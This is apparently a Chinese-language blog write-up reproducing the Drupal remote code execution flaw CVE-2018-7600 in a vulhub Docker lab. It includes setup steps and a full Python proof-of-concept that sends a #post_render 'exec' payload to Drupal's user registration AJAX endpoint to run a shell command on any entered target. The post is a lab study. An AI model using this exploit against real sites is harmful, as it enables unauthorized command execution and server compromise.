遠端程式碼執行CVE-2018-7600

zyToJH發表於2024-05-22

最近打的靶場不約而同地都用到了這個漏洞

好好復現下,主要針對的是Drupal的cms框架

漏洞環境搭建

主要利用vulhub漏洞靶場的環境搭建,建議docker配一個阿里雲的映象加速器,不然的話拉取映象的時間會很久

在/etc/docker下建立一個daemon.json檔案

寫入

{
"registry-mirrors":["https://6kx4zyno.mirror.aliyuncs.com"]
}

之後使用

systemctl daemon-reload(過載檔案)

systemctl restart docker(重啟docker服務)

發現使用docker-compose up -d命令可以迅速搭建好漏洞環境,一般在半分鐘之內

啟動docker容器

訪問8080埠

安裝完成

漏洞利用

 1 import sys
 2 import requests
 3 
 4 print ('################################################################')
 5 print ('# Proof-Of-Concept for CVE-2018-7600')
 6 print ('# by Vitalii Rudnykh')
 7 print ('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders')
 8 print ('# https://github.com/a2u/CVE-2018-7600')
 9 print ('################################################################')
10 print ('Provided only for educational or information purposes\n')
11 
12 target = input('Enter target url (example: https://domain.ltd/): ')
13 
14 # Add proxy support (eg. BURP to analyze HTTP(s) traffic)
15 # set verify = False if your proxy certificate is self signed
16 # remember to set proxies both for http and https
17 # 
18 # example:
19 #proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
20 #verify = False
21 proxies = {}
22 verify = True
23 
24 url = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' 
25 payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo ";-)" | tee hello.txt'}
26 #傳送惡意程式碼
27 r = requests.post(url, proxies=proxies, data=payload, verify=verify)
28 #驗證
29 check = requests.get(target + 'hello.txt', proxies=proxies, verify=verify)
30 if check.status_code != 200:
31   sys.exit("Not exploitable")
32 print ('\nCheck: '+target+'hello.txt')

發現在網站伺服器上的確存在hello.txt(說明程式碼已經被執行)

參考文章

https://blog.csdn.net/qq_51295677/article/details/131975245

https://blog.nsfocus.net/cve-2018-7600-analysis/

https://xz.aliyun.com/t/2271?time__1311=n4%2BxnieDq7qCqAKDtKDsf32r7GO7DgD3oggYD

https://paper.seebug.org/567/

相關文章